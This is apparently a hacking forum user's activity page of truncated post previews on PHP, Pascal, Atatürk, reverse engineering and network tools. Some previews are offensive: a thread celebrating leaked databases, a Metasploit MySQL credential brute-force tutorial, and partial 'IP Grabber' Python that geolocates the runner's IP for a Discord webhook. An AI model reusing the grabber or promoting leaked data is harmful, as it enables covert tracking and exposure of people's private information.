Recent content by Lexter
-
L
PHP crypt() Function
Definition and Usage The crypt() function returns a hashed string using DES, Blowfish, or MD5 algorithms. This function behaves different on different operating systems. PHP checks what algorithms are available and what algorithms to use when it is installed. The salt parameter is optional...- Lexter
- Thread
- Replies: 0
- Forum: PHP/JS/MySQL/Perl
-
L
Favorite database leaks
What is your favorite for database leaks? For me is Baddoo,Twitter and Facebook. -
L
MUSTAFA KEMAL AS AN ARMY COMMANDER
In 1906, he was sent to Damascus (Şam). Mustafa Kemal and his friends founded a society which they called "Vatan ve Hürriyet" (Fatherland and Freedom) in Damascus. On his own initiative, he went to Tripoli during the war with Italy in 1911 and took part in the defence of Derne and Tobruk While...- Lexter
- Thread
- Replies: 0
- Forum: MUSTAFA KEMAL ATATÜRK
-
L
MUSTAFA KEMAL’S CHILDHOOD AND EDUCATION
Mustafa Kemal Atatürk (1881- 1938) was the founder and the first President of the Republic of Turkey. Mustafa Kemal was born in 1881 in Salonika (Selanik). His fathers name was Ali Rıza Efendi. His father was customs official. His mothers name was Zübeyde Hanım. For his primary education, he...- Lexter
- Thread
- Replies: 0
- Forum: MUSTAFA KEMAL ATATÜRK
-
L
IDA Pro, Hex Rays Software
IDA Pro is one of the best and most popular reverse engineering software tools. It’s an interactive disassembler that has a built-in command language (IDC) and supports a number of executable formats for various processors and operating systems. IDA Pro also has a great number of plugins that...- Lexter
- Thread
- Replies: 3
- Forum: Reverse Engineering
-
L
Most Secure Decentralized Cloud Drive on Linux
Nowadays can we imagine that we load a large file on our thumb drive and go to our friend's home to give the file? No this is the era of cloud. We can easily store that file on our cloud storage and share it with our friend. Cloud storage solves a lot of problems. But every innovation had their... -
L
[MySQL] Cracking the Credentials
Let’s try mysql_login module first to crack some valid credentials of the MYSQL. Start METASPLOIT in Kali Linux. Type use command to load the module: Type options to see the current settings of this module: Now create a file including a list of common usernames. I just prepared a short list...- Lexter
- Thread
- Replies: 0
- Forum: Web Hacking/Security
-
L
Differences between Standard Pascal and Delphi
1. The way procedures and functions can be passed as parameters differs: Delphi requires explicit procedural types to be declared where Standard Pascal does not. 2. Delphi does not support so called 'extraprocedural gotos', in which goto statements may reference targets outside the current...- Lexter
- Thread
- Replies: 0
- Forum: Delphi / Pascal
-
L
Comparison of Pascal and Delphi
Devised by Niklaus Wirth in the late 1960s and early 1970s, Pascal is a programming language. Originally produced by Borland Software Corporation, Embarcadero Delphi is composed of an IDE, set of standard libraries, and a Pascal-based language commonly called either Object Pascal, Delphi Pascal...- Lexter
- Thread
- Replies: 0
- Forum: Delphi / Pascal
-
L
Windows Calculator app
The Windows Calculator app is a modern Windows app written in C++ and C# that ships pre-installed with Windows. The app provides standard, scientific, and programmer calculator functionality, as well as a set of converters between various units of measurement and currencies. You can use source...- Lexter
- Thread
- Replies: 0
- Forum: C / C++ / C# / .NET / Java
-
L
FERN WiFi Cracker
Fern WiFi cracker, The name says about it. It's a GUI based WiFi security auditing tool that written on Python. Fern WiFi cracker can crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or Ethernet based networks. Fern created by Saviour Emmanuel Ekiko. Here...- Lexter
- Thread
- Replies: 1
- Forum: Wireless Hacking/Security
-
L
(NMAP) Network scanning
Simple NMAP scan of IP range The default scan of nmap is to run the command and specify the IP address(es) without any other options. In this default scan, nmap will run a TCP SYN connection scan to 1000 of the most common ports as well as an icmp echo request to determine if a host is up. MORE...- Lexter
- Thread
- Replies: 0
- Forum: Network Hacking/Security
-
L
Osintgram
Osintgram is a OSINT tool on Instagram to collect, analyze and run reconnaissance. It offers an interactive shell to perform analysis on Instagram accounts by nickname. Link: https://github.com/Datalux/Osintgram- Lexter
- Thread
- Replies: 0
- Forum: Cyber Intelligence
-
L
IP Grabber
import requests import json from dhooks import Webhook, Embed from datetime import datetime hook = Webhook("webhook-url-here") time = datetime.now().strftime("%H:%M %p") ip = requests.get('https://api.ipify.org/').text r = requests.get(f'http://extreme-ip-lookup.com/json/{ip}') geo = r.json()... -
L
Python cheatsheet for beginners
Enjoy :) https://cdn-131.anonfiles.com/13g4If59o7/c9382c41-1669831133/PYTHON%20CHEATSHEET%20FOR%20BEGINNERS.pdf"